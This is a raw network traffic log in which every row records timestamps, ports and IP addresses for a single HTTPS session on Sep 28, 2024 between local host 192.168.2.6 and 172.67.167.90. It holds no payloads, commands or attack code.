Sep 28, 2024 05:23:47.403879881 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.403909922 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404078960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404093027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404117107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404123068 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404145002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404160976 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404376984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404392004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404417038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404423952 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404444933 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404460907 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404772997 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404791117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404818058 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404823065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.404844046 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.404861927 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405199051 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405211926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405270100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405270100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405277014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405306101 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405445099 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405459881 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405493975 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405498981 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.405523062 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.405539989 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490197897 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490223885 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490329027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490339994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490375042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490679979 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490696907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490725994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490731955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490756035 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490772009 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490873098 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490889072 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490957022 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.490963936 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.490995884 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491219044 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491234064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491260052 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491266966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491288900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491306067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491481066 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491499901 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491528034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491533041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491559029 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491576910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491727114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491741896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491776943 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491781950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.491803885 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.491818905 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492362976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492382050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492408991 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492413998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492436886 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492453098 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492620945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492635012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492660999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492666960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.492688894 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.492705107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577215910 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577239037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577332973 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577367067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577411890 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577625990 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577641964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577675104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577683926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577702999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577724934 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577919960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577939034 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577971935 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.577980042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.577994108 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578017950 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578206062 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578223944 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578254938 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578263998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578278065 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578299046 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578403950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578419924 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578448057 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578454018 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578475952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578495979 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578706980 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578725100 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578763008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578769922 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.578794003 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.578807116 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.579241037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579257011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579317093 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.579323053 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579361916 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.579436064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579454899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579490900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.579498053 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.579520941 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.579534054 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.664115906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664136887 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664275885 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.664340973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664392948 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.664469004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664484978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664526939 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.664541960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664585114 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.664947033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.664977074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665019035 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665039062 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665071011 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665086985 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665208101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665232897 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665261984 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665272951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665297031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665314913 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665520906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665539026 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665569067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665580988 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665606976 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665628910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665771961 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665792942 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665842056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.665853977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.665904045 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.666380882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666394949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666443110 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.666461945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666503906 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.666698933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666714907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666774988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.666788101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.666826963 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778173923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778197050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778281927 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778301954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778328896 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778352022 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778470039 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778489113 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778520107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778527021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778548956 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778568029 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778733015 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778748989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778786898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778794050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.778821945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.778825045 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779084921 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779109001 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779138088 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779144049 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779165983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779182911 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779325008 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779340982 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779371023 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779376984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779398918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779416084 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779572964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779587984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779628038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.779637098 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.779674053 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.781478882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.781500101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.781553984 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.781562090 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.781598091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.782396078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.782417059 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.782443047 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.782452106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.782475948 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.782500029 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865219116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865242004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865323067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865355968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865386009 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865570068 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865592003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865601063 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865612030 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865628004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865653038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865677118 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865775108 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865797997 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865843058 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.865852118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.865888119 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.866242886 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866260052 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866306067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.866313934 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866353989 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.866359949 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866370916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866390944 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866406918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.866416931 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.866435051 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.866455078 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.868432999 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868448973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868558884 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.868645906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868693113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.868834972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868854046 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868892908 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.868904114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.868925095 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.868941069 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.869177103 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.869195938 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.869220972 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.869229078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.869252920 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.869277000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952078104 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952105045 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952182055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952220917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952270031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952286959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952303886 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952337980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952352047 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952370882 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952389002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952589989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952611923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952662945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952683926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952708960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952721119 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952851057 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952871084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952914000 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952925920 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.952945948 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.952964067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.953203917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.953221083 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.953262091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.953274965 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.953293085 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.953310013 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.954272985 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.955425978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955447912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955507040 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.955533028 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955578089 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.955670118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955688953 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955724955 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.955737114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.955755949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.955780983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.956255913 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.956271887 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.956302881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.956319094 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:47.956336975 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.956357956 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:47.958328962 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039263964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039288998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039345026 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039391994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039416075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039433002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039697886 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039721966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039753914 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039762974 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.039788008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.039808035 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040241003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040256977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040304899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040313005 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040354967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040595055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040616989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040652037 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040658951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040683985 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040702105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.040941000 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040957928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.040994883 CEST	49739	443	192.168.2.6	172.67.167.90
